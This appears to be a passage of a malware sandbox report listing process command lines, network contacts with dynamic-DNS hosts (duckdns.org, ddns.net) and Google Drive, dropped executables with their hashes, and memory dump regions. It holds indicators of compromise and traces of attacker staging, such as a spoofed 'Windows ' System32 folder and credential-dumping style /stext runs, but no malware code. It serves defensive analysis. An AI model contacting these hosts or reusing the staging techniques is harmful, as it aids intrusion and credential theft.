C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\rrzifaienneuhgtllgiwfpebmdzeowfu"

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\btesg"

C:\Users\Public\Libraries\CLEAN.COM

C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\mnrlhdez"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | madibarohillafour.duckdns.org | udp
US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 5.130.101.191.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp
US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp
US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp
US | 8.8.8.8:53 | drive.google.com | udp
GB | 172.217.16.238:443 | drive.google.com | tcp
GB | 172.217.16.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp
US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp
US | 8.8.8.8:53 | cxcs.microsoft.net | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | myfrontmannysix.ddns.net | udp
CA | 199.189.26.138:4939 | myfrontmannysix.ddns.net | tcp
US | 8.8.8.8:53 | 138.26.189.199.in-addr.arpa | udp
CA | 199.189.26.138:4939 | myfrontmannysix.ddns.net | tcp
US | 8.8.8.8:53 | geoplugin.net | udp
NL | 178.237.33.50:80 | geoplugin.net | tcp
US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 52.111.227.14:443 | (no domain recorded) | tcp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat

MD5 e738497b75feb03a11e7b7e763f51037
SHA1 08c5205a67595a5c9e29341d03b6b66da96528e1
SHA256 897173be3c5e872e2d8560f8df743f93c8eb857f8d2d22d3196343c35e90abac
SHA512 3f1812c950e37b3048209e2abdecdfd40650541eefe9722f35771e7fc5723f409dbcffff7325421418948666c312165fa3f182ab3eb5fa442bbee46cb43118bc

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\CLEAN.GIF

MD5 7b55805a9a2ffab38db59819b5c5c274
SHA1 65996c765dfc6a7665c8835edbf1bc4e7a1c9502
SHA256 50a94c852a9b0ba9f6ca217dfa79652b48a2ac41fe2b4578faad2e8e4a95800a
SHA512 3ac6a88d062cb076feb0b3397d12c61b8575763c9bb245d92b2d0b44b10451948a1d284244870c23e4e104575f3ccd09e0e0c7ee43e888a13f384ef1444fa2fb

C:\Users\Public\Libraries\CLEAN.COM

MD5 beacddde34cecf28562a676b781d71e4
SHA1 58ee38081e67d99f494248d682ce907921b1e020
SHA256 80091724af78d5cfdcb8a3a57eaf479f2a49b3479d69e4043a4bef74d0f5ae0b
SHA512 75df3ece32221eea5ec75ec5ff58d9484f6d317c2a55a04fb811a4f25409fd1761077df8e920dd683b9f3d37233f6d1e21e3e06e2a47a6539625d23ae05c83b1

memory/1328-33-0x0000000000400000-0x00000000004F8000-memory.dmp

C:\Users\Public\Libraries\nasppvoG.pif

MD5 c116d3604ceafe7057d77ff27552c215
SHA1 452b14432fb5758b46f2897aeccd89f7c82a727d
SHA256 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA512 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

memory/3556-40-0x0000000000400000-0x0000000001400000-memory.dmp

memory/3556-42-0x0000000000400000-0x000000000041A000-memory.dmp

memory/3556-37-0x0000000000400000-0x0000000001400000-memory.dmp

memory/3556-43-0x0000000000400000-0x0000000001400000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1D28.tmp\1D29.tmp\1D2A.bat

MD5 e62f427202d3e5a3ba60ebe78567918c
SHA1 6ef0cd5ba6c871815fceb27ff095a7931452b334
SHA256 06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512 e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

C:\Users\Public\xkn.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_toejrzv5.eja.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1476-75-0x000001ECFE9F0000-0x000001ECFEA12000-memory.dmp

C:\Windows \System32\per.exe

MD5 85018be1fd913656bc9ff541f017eacd
SHA1 26d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256 c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA512 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

memory/3556-100-0x0000000000400000-0x000000000041A000-memory.dmp

memory/3556-98-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1328-106-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-107-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-109-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-108-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-110-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-111-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-113-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/2340-121-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1476-132-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1476-133-0x0000000000430000-0x00000000004F9000-memory.dmp

memory/1476-135-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4616-131-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1476-130-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2340-129-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1476-123-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2340-119-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4616-120-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1476-128-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4616-117-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2340-115-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4616-122-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2340-138-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rrzifaienneuhgtllgiwfpebmdzeowfu

MD5 463b5cfc270ed672e140fc2c1a25aec1
SHA1 23e37a49996b1208888e054fab11aa1e1a81f649
SHA256 2bd023dd922e93f6c6f471751ae97a1fd24a93aa4230e53ac91b8c37dab9b185
SHA512 b0fa0425dc462fa10a56fb28f36b84f3a0e6426922c1fd37e56c4406e713a00aef2bbc04024f06133d1f63960a97372feb32fd4ebf43105b9d9823f37820b4b6

memory/1328-141-0x00000000519A0000-0x00000000519B9000-memory.dmp

memory/1328-145-0x00000000519A0000-0x00000000519B9000-memory.dmp

memory/1328-144-0x00000000519A0000-0x00000000519B9000-memory.dmp

memory/1328-146-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-150-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-149-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-154-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-155-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-160-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-159-0x0000000033AF0000-0x0000000034AF0000-memory.dmp